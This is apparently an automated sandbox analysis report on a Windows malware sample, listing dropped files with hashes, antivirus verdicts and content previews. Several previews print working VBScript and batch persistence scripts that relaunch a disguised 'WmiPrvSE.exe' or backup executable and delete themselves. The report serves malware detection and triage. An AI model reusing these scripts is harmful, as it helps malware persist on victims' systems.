                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                C:\Users\user\AppData\Local\Temp\ yberLoad.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\4c6fK85tK7.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):4253696
                                                Entropy (8bit):7.610395400561869
                                                Encrypted:false
                                                SSDEEP:98304:TiJbE5xmRwLHVZCC55YkdOsfMvBh0ND4wELWg:TMaxAWHVkq5Y2fMkNDILWg
                                                MD5:A84070968353EDCC9559F54DEEDD8FE9
                                                SHA1:27187EA020C4FCFAD6783DEBBEA35883B1125538
                                                SHA-256:6B1FF20C95AB7EA0D16F441C6726F6112BBAE1C620696F2E9BEC01B4926DC1F4
                                                SHA-512:134A25E91D0B088A9DD57CE0310A1F164F6586624DD71A02001ECE26B70D3D8FD201ECE35B5A9B15764F983CBF9DA099B8F13B5E99584ADA093F12C506A2500E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 96%
                                                • Antivirus: Virustotal, Detection: 86%, Browse
                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................@...... .......0....@..........................`A..................@...........................P............@..................................................p......................................................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.reloc............... ..............@..P.rsrc.....@.......@.."..............@..P.....................$..............@..P........................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs

                                                Download File
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):720
                                                Entropy (8bit):5.226398779530761
                                                Encrypted:false
                                                SSDEEP:12:9vWdTzyMsRfhMA6KajMpOsIouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbNiVC:9AnyHfCATajknpD/AEmHob/uhEjdxWgr
                                                MD5:20B995CA7B8EE8F7928A5460BEB10533
                                                SHA1:024EF18EB18D9A7587066EA0380E20EF3697EC11
                                                SHA-256:B0246676F82D8C226D4C77E7FABD5347D7D9ECA9C9763B3C10D08ED5BE6246B0
                                                SHA-512:69B654E5B8C1CAAF3AEC67C1471101DC397EA304C1CA0C3CBCDDBBA8B9866F0B8344823D20621AADBD7263971B4311167B4F84EA7A8408B67DF9171A513665B7
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "2992"..mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                                C:\Users\user\AppData\Local\Temp\55dc47f4-7c66-4fb4-aa2a-4ea28e92c8cc.vbs

                                                Download File
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):720
                                                Entropy (8bit):5.233002789950433
                                                Encrypted:false
                                                SSDEEP:12:9vWdTzyMsRfhMA6KNjMpOsIouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbNiVC:9AnyHfCATNjknpD/AEmHob/uhEjdxWgr
                                                MD5:C3A7078889A8BCF086DED2FFB05B9605
                                                SHA1:4903DD4B81BB8A53D4B13BADE13D6E6AC11A727A
                                                SHA-256:8A6DE3E07BEC1DC1AB6EC8DBB81820A1DE0DF1381A8C086FA63BB38C7D9BD064
                                                SHA-512:F6FC85E9059EF237DC45778EE238928A34C63214E79D3A389933A43EF469BA8CFB8EC07EDB4852CA573B9B955DA6BCFEADFA4B962741D6CDB1B7784577BC427A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "4076"..mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                                C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs

                                                Download File
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):496
                                                Entropy (8bit):5.339665654651768
                                                Encrypted:false
                                                SSDEEP:12:9vWdDIyRfhMAyjMpOsTEfZ5jObWo0BMhFiXAp4QCk3:9A3fCAyjkIffwcMDYAp4QCw
                                                MD5:6A5E04BEEDC77DA679FF4A1FC9208993
                                                SHA1:CC056EB4C60E85515B49F5C7418D34EA0EF04E98
                                                SHA-256:84C0A10411844EDDD7C18F8E127CC3CA12933AB59A6CA028375CACA101CBCC29
                                                SHA-512:BB24121F0CC226CDF615C03425525EEFD461E771E9060E91ECF12DC925AA0528C8A307AE1CD41A9A5C4B217D5E4F4B3DF293365DC558E2DD8CB85E11EA05C790
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\ee4d24973b24ff5ccc207778de96815efb945a21.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                                C:\Users\user\AppData\Local\Temp\CyberLoader.exe

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\ yberLoad.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):3895538
                                                Entropy (8bit):7.720590977174146
                                                Encrypted:false
                                                SSDEEP:98304:rbE5xmRwLHVZCC55YkdOsfMvBh0ND4wELWU:raxAWHVkq5Y2fMkNDILWU
                                                MD5:1B4CF2A40E1387CF97DFBE1303C9619A
                                                SHA1:A3F98A0CA89495958F6171F775AA6B96BDF6E0DE
                                                SHA-256:6E7050BE5D9E4042BA632C228890329F41550608B6DE25094BDF5E4AE9448833
                                                SHA-512:A45B2066CC48CFAB284FD61AB5413BA0368BB457AF22425A8B469A83CA4FF75F3378B43DC6CE988CAAC98B8272333E31E590A3C2AE8A3FFD4B1FE9199F5B8400
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 70%
                                                • Antivirus: Virustotal, Detection: 61%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._.....................,......@........0....@.......................................@......................... ...4...T...<....0..HM......................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc...HM...0...N..................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat

                                                Download File
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):210
                                                Entropy (8bit):5.181066036181365
                                                Encrypted:false
                                                SSDEEP:6:hITg3Nou11r+DEiYlI8bKOZG1wkn23f04h:OTg9YDE1Nfzh
                                                MD5:9174B70734E64E173A51412257D73BA3
                                                SHA1:60884B87A52DEB43A68B26F94718FD4A77455B25
                                                SHA-256:67AB53B61184EB28BD26412CFBE610DB974A3E30C715D27B5B66D2685E46151A
                                                SHA-512:7C5A41EBF02C3D1ECE1EA4B92F442C4A5B7ECE077BE0246D0D8FF0191F9A6DA5F6551E548287D3542E7FCD571D22A2E88F40E9453BABBD716CE1C9CCE3E49D1B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\EunsIO9tk2.bat"

                                                C:\Users\user\AppData\Local\Temp\MVPLoader.exe

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\ yberLoad.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):348160
                                                Entropy (8bit):5.241090292773825
                                                Encrypted:false
                                                SSDEEP:3072:Qu7FpkBe8jj1KINqaaKKI4AUsMxWm5SQ3j9Tput/Y0ldez0GM0W48:QSHkBTjZaKKI4AUsMxR/RgzlQ2t
                                                MD5:F1F43CF5A79E51BA13EF602B25C63A9E
                                                SHA1:DF986285C4E6F2355B0F528A13063F5D855A250C
                                                SHA-256:4DFF4A3558B40B19E961FC8ADC45E00B2B7DBD6EBABBC219D1446BC6CA5350E8
                                                SHA-512:6867D3D6D01A4A170E4D5AB9115408A97C7E5A00730632259D9AFAE7B688F214C455C014BDFF2FC90185DD92F96C06D0C13F39AB09535E1ADD9FB7EA49EC5384
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2<..SR..SR..SR..+...SR...W..SR...V..SR...Q..SR...S..SR../S..SR...S..SR..+S..SR..SS.xSR...W..SR...R..SR.....SR..S..SR...P..SR.Rich.SR.................PE..d......f.........."....&.....t......P..........@..........................................`..........................................1..T...D2..h............p...............p......0...........................(.......@............................................text............................... ..`.rdata...\.......^..................@..@.data...H....P.......B..............@....pdata.......p.......P..............@..@.rsrc................`..............@..@.reloc.......p.......N..............@..B........................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\StYiK3n2EA

                                                Download File
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):25
                                                Entropy (8bit):4.323856189774723
                                                Encrypted:false
                                                SSDEEP:3:9hRxIpLpmUW:9uplmUW
                                                MD5:DD8B1FFDCB98B65E835046B571981510
                                                SHA1:593D886103D5BF275CD50306733842908B76751D
                                                SHA-256:CD3FBFA5C3BFE4153579168B0757C62E1ACEF9C9C4DB1E143416A4AFC87329FD
                                                SHA-512:50974947F4164FFE869709C87B3813BD2D4D1C6EA639BEA88F88A633A7F7F4D3FC30D937870024AF64D7C4DFAE54652142C3E4B485526A4FAB3F74BD669F0B2B
                                                Malicious:false
                                                Preview:pXEngD4Tm8Is2n8gDeCuqGOKY

                                                C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs

                                                Download File
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):496
                                                Entropy (8bit):5.339665654651768
                                                Encrypted:false
                                                SSDEEP:12:9vWdDIyRfhMAyjMpOsTEfZ5jObWo0BMhFiXAp4QCk3:9A3fCAyjkIffwcMDYAp4QCw
                                                MD5:6A5E04BEEDC77DA679FF4A1FC9208993
                                                SHA1:CC056EB4C60E85515B49F5C7418D34EA0EF04E98
                                                SHA-256:84C0A10411844EDDD7C18F8E127CC3CA12933AB59A6CA028375CACA101CBCC29
                                                SHA-512:BB24121F0CC226CDF615C03425525EEFD461E771E9060E91ECF12DC925AA0528C8A307AE1CD41A9A5C4B217D5E4F4B3DF293365DC558E2DD8CB85E11EA05C790
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\ee4d24973b24ff5ccc207778de96815efb945a21.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                                C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs

                                                Download File
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):496
                                                Entropy (8bit):5.339665654651768
                                                Encrypted:false
                                                SSDEEP:12:9vWdDIyRfhMAyjMpOsTEfZ5jObWo0BMhFiXAp4QCk3:9A3fCAyjkIffwcMDYAp4QCw
                                                MD5:6A5E04BEEDC77DA679FF4A1FC9208993
                                                SHA1:CC056EB4C60E85515B49F5C7418D34EA0EF04E98
                                                SHA-256:84C0A10411844EDDD7C18F8E127CC3CA12933AB59A6CA028375CACA101CBCC29
                                                SHA-512:BB24121F0CC226CDF615C03425525EEFD461E771E9060E91ECF12DC925AA0528C8A307AE1CD41A9A5C4B217D5E4F4B3DF293365DC558E2DD8CB85E11EA05C790
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\ee4d24973b24ff5ccc207778de96815efb945a21.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                                C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs

                                                Download File
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):720
                                                Entropy (8bit):5.230905880222201
                                                Encrypted:false
                                                SSDEEP:12:9vWdTzyMsRfhMA6KKljMpOsIouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbNig:9AnyHfCATKljknpD/AEmHob/uhEjdxWo
                                                MD5:434D4C6374370DAAEDB85219B66296D7
                                                SHA1:DFA1F3535D9DFA20DD479A9B14CBC250E8303C6B
                                                SHA-256:0216A901FB5F8980FE36E5852E00A4C14C3C7FE60C8A5316AB27E1DF18C11D32
                                                SHA-512:A4288E6566791CB9F5B655B536F6E205E40E1C760FA40B0B14658E9A20848EC317A4C332E0D47FB4947AF55D0E172C3F929A0B8A039189E36D6B9B750E2ACC0D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "6112"..mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                                C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs

                                                Download File
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):720
                                                Entropy (8bit):5.230225012172656
                                                Encrypted:false
                                                SSDEEP:12:9vWdTzyMsRfhMA6KcjMpOsIouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbNiVC:9AnyHfCATcjknpD/AEmHob/uhEjdxWgr
                                                MD5:01680A6ABC5ACE13F72EC66AE6979BC4
                                                SHA1:014C3631F6ED6129F9C14D5AD8006DC31C81D238
                                                SHA-256:0DF0A1169C89A6123D06E5871625375CAB94B02D14E90431F518B11E10F6D70C
                                                SHA-512:A1951F0865758379FCA4BD357EA4C2900B9E9FB56B80C190274DF3F9D4DB0AB3B52F1649A911864F9D46ED38DD4CD06C7627082292A9FAF631E7EF05B292C4D3
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "8044"..mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                                C:\Users\user\AppData\Local\Temp\e9b737bd-75a6-4059-b77c-a41b4b38424b.vbs

                                                Download File
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):496
                                                Entropy (8bit):5.339665654651768
                                                Encrypted:false
                                                SSDEEP:12:9vWdDIyRfhMAyjMpOsTEfZ5jObWo0BMhFiXAp4QCk3:9A3fCAyjkIffwcMDYAp4QCw
                                                MD5:6A5E04BEEDC77DA679FF4A1FC9208993
                                                SHA1:CC056EB4C60E85515B49F5C7418D34EA0EF04E98
                                                SHA-256:84C0A10411844EDDD7C18F8E127CC3CA12933AB59A6CA028375CACA101CBCC29
                                                SHA-512:BB24121F0CC226CDF615C03425525EEFD461E771E9060E91ECF12DC925AA0528C8A307AE1CD41A9A5C4B217D5E4F4B3DF293365DC558E2DD8CB85E11EA05C790
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\ee4d24973b24ff5ccc207778de96815efb945a21.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                                C:\Windows\ShellComponents\e5c7b42f1665e5

                                                Download File
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):52
                                                Entropy (8bit):5.07053803540718
                                                Encrypted:false
                                                SSDEEP:3:nvPkpjCzOQz5buiRiIV:vPpb1b3EY
                                                MD5:751CE1252006C898021625D1024CA73A
                                                SHA1:5973FE0B678B0691DA283723BB4C89B93E6DB9EC
                                                SHA-256:5543B34D7267C54458B940BA4008D1AA4C1138EEF05E3151FBA4ED6319603933
                                                SHA-512:EEDCD5C066DAFD688CAC86071EE716A5AC136C436EDD1879B74F8CC78C1B36E278C5639B5928055B656C682030B8C43B3EADAEF08430AFD9A82AEF61B4A7A054
                                                Malicious:false
                                                Preview:71JjRhYxBkcFveWKeeUm6bh5udvSf5U0Y39KCAWk144GV30VlFLZ

                                                C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe

                                                Download File
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3550208
                                                Entropy (8bit):7.781657928203425
                                                Encrypted:false
                                                SSDEEP:49152:/wxmcexfNwuwHmIZCw/55uvWVdgv8XquMvQ0CC3QbYGpRFCwEg5/MPoxPr2G:4xmRwLHVZCC55YkdOsfMvBh0ND4wELW
                                                MD5:53758CEA18D59182A809208313D5042A
                                                SHA1:0234E732DEA00414C79CA2CE8A55F61843F282D2
                                                SHA-256:5CAE0557099A16D45A03F05F95390EC5BD5BA5A44EDD73286E741FE09F93BDDF
                                                SHA-512:3D7900C7A6060367BEAF7ABDE33027958D28091B001D25C395D191F0CF442216D5CACFF4A123BBD1AE767F471AE3A517659F9C42798BE8C772F2F7411A7B952E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 88%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6......>.6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text...D.5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......&6.............@..@.reloc........6......*6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\msPortRefnetdhcp\componentWininto.exe

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3550208
                                                Entropy (8bit):7.781657928203425
                                                Encrypted:false
                                                SSDEEP:49152:/wxmcexfNwuwHmIZCw/55uvWVdgv8XquMvQ0CC3QbYGpRFCwEg5/MPoxPr2G:4xmRwLHVZCC55YkdOsfMvBh0ND4wELW
                                                MD5:53758CEA18D59182A809208313D5042A
                                                SHA1:0234E732DEA00414C79CA2CE8A55F61843F282D2
                                                SHA-256:5CAE0557099A16D45A03F05F95390EC5BD5BA5A44EDD73286E741FE09F93BDDF
                                                SHA-512:3D7900C7A6060367BEAF7ABDE33027958D28091B001D25C395D191F0CF442216D5CACFF4A123BBD1AE767F471AE3A517659F9C42798BE8C772F2F7411A7B952E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 88%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6......>.6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text...D.5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......&6.............@..@.reloc........6......*6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\msPortRefnetdhcp\file.vbs

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):34
                                                Entropy (8bit):4.124083797069061
                                                Encrypted:false
                                                SSDEEP:3:LlzRWDNMSdn:PWbn
                                                MD5:677CC4360477C72CB0CE00406A949C61
                                                SHA1:B679E8C3427F6C5FC47C8AC46CD0E56C9424DE05
                                                SHA-256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
                                                SHA-512:7CFE2CC92F9E659F0A15A295624D611B3363BD01EB5BCF9BC7681EA9B70B0564D192D570D294657C8DC2C93497FA3B4526C975A9BF35D69617C31D9936573C6A
                                                Malicious:false
                                                Preview:MsgBox "TestDefault, Message!", 64

                                                C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):42
                                                Entropy (8bit):4.1728107335198645
                                                Encrypted:false
                                                SSDEEP:3:I5my4UTGTVKLA+Ls0E:IQUuOKJ
                                                MD5:B025044714B20D9D7069A2C2F55DDF04
                                                SHA1:36D7DCE3F0FA6A1BD86E795BCDE3C9A1B2E9A7F6
                                                SHA-256:E6D9546E0E8D9B92EF203F408F33722C3B4FFCD2F400AA08BB0B49AC182B69B3
                                                SHA-512:3A24C4AD9C1B298A97C5D4E994233A84DC27D4C0D612CC8D8E94CBD16E3CEAEC96D66D4503A6A506644DE509A3509F53EA122BF92CC09DE087254F40B5A1C65C
                                                Malicious:false
                                                Preview:"C:\msPortRefnetdhcp\componentWininto.exe"

                                                C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):208
                                                Entropy (8bit):5.775204519466763
                                                Encrypted:false
                                                SSDEEP:6:GogwqK+NkLzWbH9WF08nZNDd3RL1wQJRdxcr3NvueUfU:GoBMCzWL74d3XBJDC5Us
                                                MD5:C7C964910BEF0490E2A401349C25126B
                                                SHA1:BA3581DC5945F35F83BC216FC5A1DECFBE6E47EF
                                                SHA-256:D41A100832E46A8928AD06780A40E08F147E97AC014170CA48779F98F4D5B7FF
                                                SHA-512:198C571A056D5896928B5A93C918E9F7407DD0D5E39893DB39A1DBCAD9D6EC2DF63925CBE69346F8F4681BFE37C23844FEEE5CBD1F45BC9C48796AEF1D66372F
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:#@~^twAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ:dhWMYI.0.nY9t^wJ:.B^r|GFxsMr..CR(lDJSPTS,0CVknEzoAAA==^#~@.

                                                \Device\Null

                                                Download File
                                                Process:C:\Windows\System32\w32tm.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):151
                                                Entropy (8bit):4.798324055503179
                                                Encrypted:false
                                                SSDEEP:3:VLV993J+miJWEoJ8FX7sXpDZKUHLvoE9Avj:Vx993DEUZDZKykE9q
                                                MD5:587332B5D3D0AF9F512650B6D1AD3D83
                                                SHA1:C2F072E11BC788EFA235857AF84AEE3EAD10DEFD
                                                SHA-256:B5B733B2AEF194CFB3F93921E0396273C073A58E4D6DBBEE2B98DF5DA463E073
                                                SHA-512:9242E0C6703D0C8895BF8529690C0DBB54D5D5C9CBD21C254906371233DD6F188E7662ADD6825DDF72E624AA6503A1C85C199C4758C5D6BF893FAA8396290AAD
                                                Malicious:false
                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 25/04/2024 11:46:00..11:46:00, error: 0x80072746.11:46:05, error: 0x80072746.

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.587756781339567
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.94%
                                                • Win32 Executable (generic) a (10002005/4) 49.89%
                                                • Win32 Executable Delphi generic (14689/80) 0.07%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                File name:4c6fK85tK7.exe
                                                File size:4'329'984 bytes
                                                MD5:68dfe1e08b8cc7d19ff72334fdd09db8
